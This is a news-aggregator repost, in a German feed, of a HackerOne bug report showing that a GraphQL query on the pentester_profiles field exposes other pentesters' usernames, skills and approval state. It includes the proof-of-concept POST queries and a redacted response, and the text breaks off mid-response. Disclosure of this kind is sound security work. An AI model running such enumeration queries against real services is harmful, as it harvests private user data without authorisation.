๐ HackerOne: Pentester can obtain information about other pentesters who applied for the same test, but weren't accepted
๐ก Newskategorie: Sicherheitslรผcken
๐ Quelle: vulners.com
Hi team, I don't know your policy about pentesters(about their visibility on the platform), But I couldn't find any other pentesters before. 1) For example: GraphQL has the h1_pentester attribute that would explicitly point us to the pentester, but if we make a query, it doesn't reveal the pentester to us. https://hackerone.com/graphql POST {"query":"query { user(username:\\"โโโ\\"){username,h1_pentester}}","variables":{}} Answer: {"data":{"user":{"username":"โโโโโโโ","h1_pentester":null}}} As we can see, I can't say that he is a pentester. And if I understand the policy correctly in this situation, H1 does not disclose to others who the pentester 2) PoC: https://hackerone.com/graphql POST {"query":"query { pentester_profiles{total_count,nodes{skills{nodes{name}},state,user{username}}}}","variables":{}} Answer: {"data":{"pentester_profiles":{"total_count":8,"nodes":[{"skills":{"nodes":[{"name":"Web Applications"},{"name":"Mobile Applications"},{"name":"Native Applications"},{"name":"Android"},{"name":"iOS"},{"name":"API"}]},"state":"approved","user":{"username":"โโโโโ"}},{"skills":{"nodes":[{"name":"Web Applications"},{"name":"Mobile Applications"},{"name":"Network Security"},{"name":"Android"},{"name":"iOS"},{"name":"API"},{"name":"Web applications"}]},"state":"approved","user":{"username":"โโโโโโ"}},{"skills":{"nodes":[{"name":"Web Applications"},{"name":"Mobile Applications"},{"name":"Native Applications"},{"name":"Network... ...